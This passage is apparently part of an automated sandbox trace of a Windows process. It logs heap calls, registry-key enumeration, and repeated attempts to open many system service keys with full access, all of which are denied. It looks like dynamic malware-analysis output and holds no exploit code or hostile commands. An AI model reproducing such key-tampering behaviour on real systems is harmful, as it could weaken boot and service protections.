GetProcessHeap () returned 0x4a0000 [0174.851] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x4e) returned 0x4b6638 [0174.851] GetProcessHeap () returned 0x4a0000 [0174.851] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x14) returned 0x4b66a8 [0174.851] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x31, lpName=0x4b61c8, lpcchName=0x2bfd90, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{4D36E980-E325-11CE-BFC1-08002BE10318}", lpcchName=0x2bfd90, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0174.851] lstrlenW (lpString="{4D36E980-E325-11CE-BFC1-08002BE10318}") returned 38 [0174.851] GetProcessHeap () returned 0x4a0000 [0174.851] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x4e) returned 0x4b6e90 [0174.851] GetProcessHeap () returned 0x4a0000 [0174.851] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x14) returned 0x4b66c8 [0174.851] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x32, lpName=0x4b61c8, lpcchName=0x2bfd90, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{533C5B84-EC70-11D2-9505-00C04F79DEAF}", lpcchName=0x2bfd90, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0174.851] lstrlenW (lpString="{533C5B84-EC70-11D2-9505-00C04F79DEAF}") returned 38 [0174.852] GetProcessHeap () returned 0x4a0000 [0174.852] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x4e) returned 0x4b6ee8 [0174.852] GetProcessHeap () returned 0x4a0000 [0174.852] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x14) returned 0x4b66e8 [0174.852] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x33, lpName=0x4b61c8, lpcchName=0x2bfd90, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{6BDD1FC1-810F-11D0-BEC7-08002BE2092F}", lpcchName=0x2bfd90, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0174.852] lstrlenW (lpString="{6BDD1FC1-810F-11D0-BEC7-08002BE2092F}") returned 38 [0174.852] GetProcessHeap () returned 0x4a0000 [0174.852] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x4e) returned 0x4b6f40 [0174.852] GetProcessHeap () returned 0x4a0000 [0174.852] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x14) returned 0x4b6708 [0174.852] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x34, lpName=0x4b61c8, lpcchName=0x2bfd90, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{71A27CDD-812A-11D0-BEC7-08002BE2092F}", lpcchName=0x2bfd90, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0174.852] lstrlenW (lpString="{71A27CDD-812A-11D0-BEC7-08002BE2092F}") returned 38 [0174.852] GetProcessHeap () returned 0x4a0000 [0174.852] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x4e) returned 0x4b6f98 [0174.852] GetProcessHeap () returned 0x4a0000 [0174.853] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x14) returned 0x4b6728 [0174.853] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x35, lpName=0x4b61c8, lpcchName=0x2bfd90, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{745A17A0-74D3-11D0-B6FE-00A0C90F57DA}", lpcchName=0x2bfd90, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0174.853] lstrlenW (lpString="{745A17A0-74D3-11D0-B6FE-00A0C90F57DA}") returned 38 [0174.853] GetProcessHeap () returned 0x4a0000 [0174.853] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x4e) returned 0x4b6ff0 [0174.853] GetProcessHeap () returned 0x4a0000 [0174.853] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x14) returned 0x4b6748 [0174.853] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x36, lpName=0x4b61c8, lpcchName=0x2bfd90, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{D48179BE-EC20-11D1-B6B8-00C04FA372A7}", lpcchName=0x2bfd90, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0174.853] lstrlenW (lpString="{D48179BE-EC20-11D1-B6B8-00C04FA372A7}") returned 38 [0174.853] GetProcessHeap () returned 0x4a0000 [0174.853] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x4e) returned 0x4b7048 [0174.853] GetProcessHeap () returned 0x4a0000 [0174.853] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x14) returned 0x4b6768 [0174.853] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x37, lpName=0x4b61c8, lpcchName=0x2bfd90, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{D94EE5D8-D189-4994-83D2-F68D7D41B0E6}", lpcchName=0x2bfd90, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0174.853] lstrlenW (lpString="{D94EE5D8-D189-4994-83D2-F68D7D41B0E6}") returned 38 [0174.853] GetProcessHeap () returned 0x4a0000 [0174.853] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x4e) returned 0x4b70b8 [0174.854] GetProcessHeap () returned 0x4a0000 [0174.854] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x14) returned 0x4b6788 [0174.854] GetProcessHeap () returned 0x4a0000 [0174.854] GetProcessHeap () returned 0x4a0000 [0174.854] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b61c8) returned 1 [0174.854] GetProcessHeap () returned 0x4a0000 [0174.854] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b61c8) returned 0x9e [0174.854] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b61c8 | out: hHeap=0x4a0000) returned 1 [0174.854] RegOpenKeyExW (in: hKey=0x78, lpSubKey="AppInfo", ulOptions=0x0, samDesired=0xf003f, phkResult=0x2bfd58 | out: phkResult=0x2bfd58*=0x0) returned 0x5 [0174.854] RegOpenKeyExW (in: hKey=0x78, lpSubKey="AppMgmt", ulOptions=0x0, samDesired=0xf003f, phkResult=0x2bfd58 | out: phkResult=0x2bfd58*=0x0) returned 0x5 [0174.855] RegOpenKeyExW (in: hKey=0x78, lpSubKey="Base", ulOptions=0x0, samDesired=0xf003f, phkResult=0x2bfd58 | out: phkResult=0x2bfd58*=0x0) returned 0x5 [0174.855] RegOpenKeyExW (in: hKey=0x78, lpSubKey="Boot Bus Extender", ulOptions=0x0, samDesired=0xf003f, phkResult=0x2bfd58 | out: phkResult=0x2bfd58*=0x0) returned 0x5 [0174.855] RegOpenKeyExW (in: hKey=0x78, lpSubKey="Boot file system", ulOptions=0x0, samDesired=0xf003f, phkResult=0x2bfd58 | out: phkResult=0x2bfd58*=0x0) returned 0x5 [0174.855] RegOpenKeyExW (in: hKey=0x78, lpSubKey="CryptSvc", ulOptions=0x0, samDesired=0xf003f, phkResult=0x2bfd58 | out: phkResult=0x2bfd58*=0x0) returned 0x5 [0174.856] RegOpenKeyExW (in: hKey=0x78, lpSubKey="DcomLaunch", ulOptions=0x0, samDesired=0xf003f, phkResult=0x2bfd58 | out: phkResult=0x2bfd58*=0x0) returned 0x5 [0174.856] RegOpenKeyExW (in: hKey=0x78, lpSubKey="EFS", ulOptions=0x0, samDesired=0xf003f, phkResult=0x2bfd58 | out: phkResult=0x2bfd58*=0x0) returned 0x5 [0174.856] RegOpenKeyExW (in: hKey=0x78, lpSubKey="EventLog", ulOptions=0x0, samDesired=0xf003f, phkResult=0x2bfd58 | out: phkResult=0x2bfd58*=0x0) returned 0x5 [0174.857] RegOpenKeyExW (in: hKey=0x78, lpSubKey="File system", ulOptions=0x0, samDesired=0xf003f, phkResult=0x2bfd58 | out: phkResult=0x2bfd58*=0x0) returned 0x5 [0174.857] RegOpenKeyExW (in: hKey=0x78, lpSubKey="Filter", ulOptions=0x0, samDesired=0xf003f, phkResult=0x2bfd58 | out: phkResult=0x2bfd58*=0x0) returned 0x5 [0174.857] RegOpenKeyExW (in: hKey=0x78, lpSubKey="HelpSvc", ulOptions=0x0, samDesired=0xf003f, phkResult=0x2bfd58 | out: phkResult=0x2bfd58*=0x0) returned 0x5 [0174.858] RegOpenKeyExW (in: hKey=0x78, lpSubKey="KeyIso", ulOptions=0x0, samDesired=0xf003f, phkResult=0x2bfd58 | out: phkResult=0x2bfd58*=0x0) returned 0x5 [0174.858] RegOpenKeyExW (in: hKey=0x78, lpSubKey="Netlogon", ulOptions=0x0, samDesired=0xf003f, phkResult=0x2bfd58 | out: phkResult=0x2bfd58*=0x0) returned 0x5 [0174.858] RegOpenKeyExW (in: hKey=0x78, lpSubKey="NTDS", ulOptions=0x0, samDesired=0xf003f, phkResult=0x2bfd58 | out: phkResult=0x2bfd58*=0x0) returned 0x5 [0174.858] RegOpenKeyExW (in: hKey=0x78, lpSubKey="PCI Configuration", ulOptions=0x0, samDesired=0xf003f, phkResult=0x2bfd58 | out: phkResult=0x2bfd58*=0x0) returned 0x5 [0174.859] RegOpenKeyExW (in: hKey=0x78, lpSubKey="PlugPlay", ulOptions=0x0, samDesired=0xf003f, phkResult=0x2bfd58 | out: phkResult=0x2bfd58*=0x0) returned 0x5 [0174.859] RegOpenKeyExW (in: hKey=0x78, lpSubKey="PNP Filter", ulOptions=0x0, samDesired=0xf003f, phkResult=0x2bfd58 | out: phkResult=0x2bfd58*=0x0) returned 0x5 [0174.859] RegOpenKeyExW (in: hKey=0x78, lpSubKey="Primary disk", ulOptions=0x0, samDesired=0xf003f, phkResult=0x2bfd58 | out: phkResult=0x2bfd58*=0x0) returned 0x5 [0175.005] RegOpenKeyExW (in: hKey=0x78, lpSubKey="RpcEptMapper", ulOptions=0x0, samDesired=0xf003f, phkResult=0x2bfd58 | out: phkResult=0x2bfd58*=0x0) returned 0x5 [0175.006] RegOpenKeyExW (in: hKey=0x78, lpSubKey="RpcSs", ulOptions=0x0, samDesired=0xf003f, phkResult=0x2bfd58 | out: phkResult=0x2bfd58*=0x0) returned 0x5 [0175.006] RegOpenKeyExW (in: hKey=0x78, lpSubKey="sacsvr", ulOptions=0x0, samDesired=0xf003f, phkResult=0x2bfd58 | out: phkResult=0x2bfd58*=0x0) returned 0x5 [0175.007] RegOpenKeyExW (in: hKey=0x78, lpSubKey="SCSI Class", ulOptions=0x0, samDesired=0xf003f, phkResult=0x2bfd58 | out: phkResult=0x2bfd58*=0x0) returned 0x5 [0175.007] RegOpenKeyExW (in: hKey=0x78, lpSubKey="sermouse.sys", ulOptions=0x0, samDesired=0xf003f, phkResult=0x2bfd58 | out: phkResult=0x2bfd58*=0x0) returned 0x5 [0175.007] RegOpenKeyExW (in: hKey=0x78, lpSubKey="SWPRV", ulOptions=0x0, samDesired=0xf003f, phkResult=0x2bfd58 | out: phkResult=0x2bfd58*=0x0) returned 0x5 [0175.008] RegOpenKeyExW (in: hKey=0x78, lpSubKey="System Bus Extender", ulOptions=0x0, samDesired=0xf003f, phkResult=0x2bfd58 | out: phkResult=0x2bfd58*=0x0) returned 0x5 [0175.008] RegOpenKeyExW (in: hKey=0x78, lpSubKey="TabletInputService", ulOptions=0x0, samDesired=0xf003f, phkResult=0x2bfd58 | out: phkResult=0x2bfd58*=0x0) returned 0x5 [0175.009] RegOpenKeyExW (in: hKey=0x78, lpSubKey="TBS", ulOptions=0x0, samDesired=0xf003f, phkResult=0x2bfd58 | out: phkResult=0x2bfd58*=0x0) returned 0x5 [0175.009] RegOpenKeyExW (in: hKey=0x78, lpSubKey="TrustedInstaller", ulOptions=0x0, samDesired=0xf003f, phkResult=0x2bfd58 | out: phkResult=0x2bfd58*=0x0) returned 0x5 [0175.010] RegOpenKeyExW (in: hKey=0x78, lpSubKey="VDS", ulOptions=0x0, samDesired=0xf003f, phkResult=0x2bfd58 | out: phkResult=0x2bfd58*=0x0) returned 0x5 [0175.010] RegOpenKeyExW (in: hKey=0x78, lpSubKey="vga.sys", ulOptions=0x0, samDesired=0xf003f, phkResult=0x2bfd58 | out: phkResult=0x2bfd58*=0x0) returned 0x5 [0175.010] RegOpenKeyExW (in: hKey=0x78, lpSubKey="vgasave.sys", ulOptions=0x0, samDesired=0xf003f, phkResult=0x2bfd58 | out: phkResult=0x2bfd58*=0x0) returned 0x5 [0175.011] RegOpenKeyExW (in: hKey=0x78, lpSubKey="vmms", ulOptions=0x0, samDesired=0xf003f, phkResult=0x2bfd58 | out: phkResult=0x2bfd58*=0x0) returned 0x5 [0175.011] RegOpenKeyExW (in: hKey=0x78, lpSubKey="volmgr.sys", ulOptions=0x0, samDesired=0xf003f, phkResult=0x2bfd58 | out: phkResult=0x2bfd58*=0x0) returned 0x5 [0175.011] RegOpenKeyExW (in: hKey=0x78, lpSubKey="volmgrx.sys", ulOptions=0x0, samDesired=0xf003f, phkResult=0x2bfd58 | out: phkResult=0x2bfd58*=0x0) returned 0x5 [0175.012] RegOpenKeyExW (in: hKey=0x78, lpSubKey="WinMgmt", ulOptions=0x0, samDesired=0xf003f, phkResult=0x2bfd58 | out: phkResult=0x2bfd58*=0x0) returned 0x5 [0175.012] RegOpenKeyExW (in: hKey=0x78, lpSubKey="WudfPf", ulOptions=0x0, samDesired=0xf003f, phkResult=0x2bfd58 | out: phkResult=0x2bfd58*=0x0) returned 0x5 [0175.013] RegOpenKeyExW (in: hKey=0x78, lpSubKey="WudfRd", ulOptions=0x0, samDesired=0xf003f, phkResult=0x2bfd58 | out: phkResult=0x2bfd58*=0x0) returned 0x5 [0175.013] RegOpenKeyExW (in: hKey=0x78, lpSubKey="WudfSvc", ulOptions=0x0, samDesired=0xf003f, phkResult=0x2bfd58 | out: phkResult=0x2bfd58*=0x0) returned 0x5 [0175.014] RegOpenKeyExW (in: hKey=0x78, lpSubKey="{36FC9E60-C465-11CF-8056-444553540000}", ulOptions=0x0, samDesired=0xf003f, phkResult=0x2bfd58 | out: phkResult=0x2bfd58*=0x0) returned 0x5 [0175.014] RegOpenKeyExW (in: hKey=0x78, lpSubKey="{4D36E965-E325-11CE-BFC1-08002BE10318}", ulOptions=0x0, samDesired=0xf003f, phkResult=0x2bfd58 | out: phkResult=0x2bfd58*=0x0) returned 0x5 [0175.015] RegOpenKeyExW (in: hKey=0x78, lpSubKey="{4D36E967-E325-11CE-BFC1-08002BE10318}", ulOptions=0x0, samDesired=0xf003f, phkResult=0x2bfd58 | out: phkResult=0x2bfd58*=0x0) returned 0x5 [0175.015] RegOpenKeyExW (in: hKey=0x78, lpSubKey="{4D36E969-E325-11CE-BFC1-08002BE10318}", ulOptions=0x0, samDesired=0xf003f, phkResult=0x2bfd58 | out: phkResult=0x2bfd58*=0x0) returned 0x5 [0175.016] RegOpenKeyExW (in: hKey=0x78, lpSubKey="{4D36E96A-E325-11CE-BFC1-08002BE10318}", ulOptions=0x0, samDesired=0xf003f, phkResult=0x2bfd58 | out: phkResult=0x2bfd58*=0x0) returned 0x5 [0175.016] RegOpenKeyExW (in: hKey=0x78, lpSubKey="{4D36E96B-E325-11CE-BFC1-08002BE10318}", ulOptions=0x0, samDesired=0xf003f, phkResult=0x2bfd58 | out: phkResult=0x2bfd58*=0x0) returned 0x5 [0175.021] RegOpenKeyExW (in: hKey=0x78, lpSubKey="{4D36E96F-E325-11CE-BFC1-08002BE10318}", ulOptions=0x0, samDesired=0xf003f, phkResult=0x2bfd58 | out: phkResult=0x2bfd58*=0x0) returned 0x5 [0175.021] RegOpenKeyExW (in: hKey=0x78, lpSubKey="{4D36E977-E325-11CE-BFC1-08002BE10318}", ulOptions=0x0, samDesired=0xf003f, phkResult=0x2bfd58 | out: phkResult=0x2bfd58*=0x0) returned 0x5 [0175.022] RegOpenKeyExW (in: hKey=0x78, lpSubKey="{4D36E97B-E325-11CE-BFC1-08002BE10318}", ulOptions=0x0, samDesired=0xf003f, phkResult=0x2bfd58 | out: phkResult=0x2bfd58*=0x0) returned 0x5 [0175.022] RegOpenKeyExW (in: hKey=0x78, lpSubKey="{4D36E97D-E325-11CE-BFC1-08002BE10318}", ulOptions=0x0, samDesired=0xf003f, phkResult=0x2bfd58 | out: phkResult=0x2bfd58*=0x0) returned 0x5 [0175.023] RegOpenKeyExW (in: hKey=0x78, lpSubKey="{4D36E980-E325-11CE-BFC1-08002BE10318}", ulOptions=0x0, samDesired=0xf003f, phkResult=0x2bfd58 | out: phkResult=0x2bfd58*=0x0) returned 0x5 [0175.023] RegOpenKeyExW (in: hKey=0x78, lpSubKey="{533C5B84-EC70-11D2-9505-00C04F79DEAF}", ulOptions=0x0, samDesired=0xf003f, phkResult=0x2bfd58 | out: phkResult=0x2bfd58*=0x0) returned 0x5 [0175.024] RegOpenKeyExW (in: hKey=0x78, lpSubKey="{6BDD1FC1-810F-11D0-BEC7-08002BE2092F}", ulOptions=0x0, samDesired=0xf003f, phkResult=0x2bfd58 | out: phkResult=0x2bfd58*=0x0) returned 0x5 [0175.024] RegOpenKeyExW (in: hKey=0x78, lpSubKey="{71A27CDD-812A-11D0-BEC7-08002BE2092F}", ulOptions=0x0, samDesired=0xf003f, phkResult=0x2bfd58 | out: phkResult=0x2bfd58*=0x0) returned 0x5 [0175.025] RegOpenKeyExW (in: hKey=0x78, lpSubKey="{745A17A0-74D3-11D0-B6FE-00A0C90F57DA}", ulOptions=0x0, samDesired=0xf003f, phkResult=0x2bfd58 | out: phkResult=0x2bfd58*=0x0) returned 0x5 [0175.025] RegOpenKeyExW (in: hKey=0x78, lpSubKey="{D48179BE-EC20-11D1-B6B8-00C04FA372A7}", ulOptions=0x0, samDesired=0xf003f, phkResult=0x2bfd58 | out: phkResult=0x2bfd58*=0x0) returned 0x5 [0175.025] RegOpenKeyExW (in: hKey=0x78, lpSubKey="{D94EE5D8-D189-4994-83D2-F68D7D41B0E6}", ulOptions=0x0, samDesired=0xf003f, phkResult=0x2bfd58 | out: phkResult=0x2bfd58*=0x0) returned 0x5 [0175.026] GetProcessHeap () returned 0x4a0000 [0175.026] GetProcessHeap () returned 0x4a0000 [0175.026] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5df8) returned 1 [0175.026] GetProcessHeap () returned 0x4a0000 [0175.026] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b5df8) returned 0x10 [0175.026] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5df8 | out: hHeap=0x4a0000) returned 1 [0175.026] GetProcessHeap () returned 0x4a0000 [0175.026] GetProcessHeap () returned 0x4a0000 [0175.026] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b53e8) returned 1 [0175.026] GetProcessHeap () returned 0x4a0000 [0175.027] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b53e8) returned 0x14 [0175.027] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b53e8 | out: hHeap=0x4a0000) returned 1 [0175.027] GetProcessHeap () returned 0x4a0000 [0175.027] GetProcessHeap () returned 0x4a0000 [0175.027] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5e10) returned 1 [0175.027] GetProcessHeap () returned 0x4a0000 [0175.027] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b5e10) returned 0x10 [0175.027] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5e10 | out: hHeap=0x4a0000) returned 1 [0175.027] GetProcessHeap () returned 0x4a0000 [0175.027] GetProcessHeap () returned 0x4a0000 [0175.027] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5408) returned 1 [0175.027] GetProcessHeap () returned 0x4a0000 [0175.027] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b5408) returned 0x14 [0175.028] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5408 | out: hHeap=0x4a0000) returned 1 [0175.028] GetProcessHeap () returned 0x4a0000 [0175.028] GetProcessHeap () returned 0x4a0000 [0175.028] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5e28) returned 1 [0175.028] GetProcessHeap () returned 0x4a0000 [0175.028] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b5e28) returned 0xa [0175.028] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5e28 | out: hHeap=0x4a0000) returned 1 [0175.028] GetProcessHeap () returned 0x4a0000 [0175.028] GetProcessHeap () returned 0x4a0000 [0175.028] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5428) returned 1 [0175.028] GetProcessHeap () returned 0x4a0000 [0175.028] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b5428) returned 0x14 [0175.028] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5428 | out: hHeap=0x4a0000) returned 1 [0175.029] GetProcessHeap () returned 0x4a0000 [0175.029] GetProcessHeap () returned 0x4a0000 [0175.029] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5238) returned 1 [0175.029] GetProcessHeap () returned 0x4a0000 [0175.029] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b5238) returned 0x24 [0175.029] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5238 | out: hHeap=0x4a0000) returned 1 [0175.029] GetProcessHeap () returned 0x4a0000 [0175.029] GetProcessHeap () returned 0x4a0000 [0175.029] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5448) returned 1 [0175.029] GetProcessHeap () returned 0x4a0000 [0175.029] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b5448) returned 0x14 [0175.029] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5448 | out: hHeap=0x4a0000) returned 1 [0175.029] GetProcessHeap () returned 0x4a0000 [0175.030] GetProcessHeap () returned 0x4a0000 [0175.030] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b50a8) returned 1 [0175.030] GetProcessHeap () returned 0x4a0000 [0175.030] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b50a8) returned 0x22 [0175.030] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b50a8 | out: hHeap=0x4a0000) returned 1 [0175.030] GetProcessHeap () returned 0x4a0000 [0175.030] GetProcessHeap () returned 0x4a0000 [0175.030] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5468) returned 1 [0175.030] GetProcessHeap () returned 0x4a0000 [0175.030] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b5468) returned 0x14 [0175.030] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5468 | out: hHeap=0x4a0000) returned 1 [0175.030] GetProcessHeap () returned 0x4a0000 [0175.030] GetProcessHeap () returned 0x4a0000 [0175.031] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5488) returned 1 [0175.031] GetProcessHeap () returned 0x4a0000 [0175.031] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b5488) returned 0x12 [0175.031] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5488 | out: hHeap=0x4a0000) returned 1 [0175.031] GetProcessHeap () returned 0x4a0000 [0175.031] GetProcessHeap () returned 0x4a0000 [0175.031] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b54a8) returned 1 [0175.031] GetProcessHeap () returned 0x4a0000 [0175.031] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b54a8) returned 0x14 [0175.031] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b54a8 | out: hHeap=0x4a0000) returned 1 [0175.031] GetProcessHeap () returned 0x4a0000 [0175.031] GetProcessHeap () returned 0x4a0000 [0175.032] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b54c8) returned 1 [0175.032] GetProcessHeap () returned 0x4a0000 [0175.032] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b54c8) returned 0x16 [0175.032] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b54c8 | out: hHeap=0x4a0000) returned 1 [0175.032] GetProcessHeap () returned 0x4a0000 [0175.032] GetProcessHeap () returned 0x4a0000 [0175.036] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b54e8) returned 1 [0175.036] GetProcessHeap () returned 0x4a0000 [0175.036] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b54e8) returned 0x14 [0175.036] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b54e8 | out: hHeap=0x4a0000) returned 1 [0175.036] GetProcessHeap () returned 0x4a0000 [0175.037] GetProcessHeap () returned 0x4a0000 [0175.037] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b3ab8) returned 1 [0175.037] GetProcessHeap () returned 0x4a0000 [0175.037] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b3ab8) returned 0x8 [0175.037] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b3ab8 | out: hHeap=0x4a0000) returned 1 [0175.037] GetProcessHeap () returned 0x4a0000 [0175.037] GetProcessHeap () returned 0x4a0000 [0175.037] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5508) returned 1 [0175.037] GetProcessHeap () returned 0x4a0000 [0175.037] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b5508) returned 0x14 [0175.037] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5508 | out: hHeap=0x4a0000) returned 1 [0175.037] GetProcessHeap () returned 0x4a0000 [0175.037] GetProcessHeap () returned 0x4a0000 [0175.037] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5528) returned 1 [0175.038] GetProcessHeap () returned 0x4a0000 [0175.038] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b5528) returned 0x12 [0175.038] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5528 | out: hHeap=0x4a0000) returned 1 [0175.038] GetProcessHeap () returned 0x4a0000 [0175.038] GetProcessHeap () returned 0x4a0000 [0175.038] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5548) returned 1 [0175.038] GetProcessHeap () returned 0x4a0000 [0175.038] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b5548) returned 0x14 [0175.038] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5548 | out: hHeap=0x4a0000) returned 1 [0175.038] GetProcessHeap () returned 0x4a0000 [0175.038] GetProcessHeap () returned 0x4a0000 [0175.038] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5568) returned 1 [0175.038] GetProcessHeap () returned 0x4a0000 [0175.039] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b5568) returned 0x18 [0175.039] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5568 | out: hHeap=0x4a0000) returned 1 [0175.039] GetProcessHeap () returned 0x4a0000 [0175.039] GetProcessHeap () returned 0x4a0000 [0175.039] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5588) returned 1 [0175.039] GetProcessHeap () returned 0x4a0000 [0175.039] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b5588) returned 0x14 [0175.039] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5588 | out: hHeap=0x4a0000) returned 1 [0175.039] GetProcessHeap () returned 0x4a0000 [0175.039] GetProcessHeap () returned 0x4a0000 [0175.039] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5e40) returned 1 [0175.039] GetProcessHeap () returned 0x4a0000 [0175.039] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b5e40) returned 0xe [0175.040] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5e40 | out: hHeap=0x4a0000) returned 1 [0175.040] GetProcessHeap () returned 0x4a0000 [0175.040] GetProcessHeap () returned 0x4a0000 [0175.040] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b55a8) returned 1 [0175.040] GetProcessHeap () returned 0x4a0000 [0175.040] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, 